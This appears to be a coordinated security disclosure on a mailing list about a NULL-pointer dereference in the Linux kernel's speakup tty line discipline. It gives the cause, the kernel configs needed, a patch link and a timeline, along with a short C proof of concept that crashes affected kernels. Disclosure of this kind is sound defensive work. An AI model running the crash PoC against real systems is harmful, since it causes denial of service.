Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close

[Shisong Qin <qinshisong1205 () gmail com>]

Hi,

Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty device and use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and in the second close would try to
dereference the "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    int disc = 0x1a;
    int fd = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd, 0x5423, &disc);
    int fd2 = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd2, 0x5423, &disc);
    return 0;
}

After the process return, it seems the automated calling to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1

Timeline:
* 2020/11/10 - Vulnerability reported to security () kernel org
* 2020/11/11 - Vulnerability confirmed, and reported to
linux-distros () vs openwall org.
* 2020/11/19 - Vulnerability opened.

Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University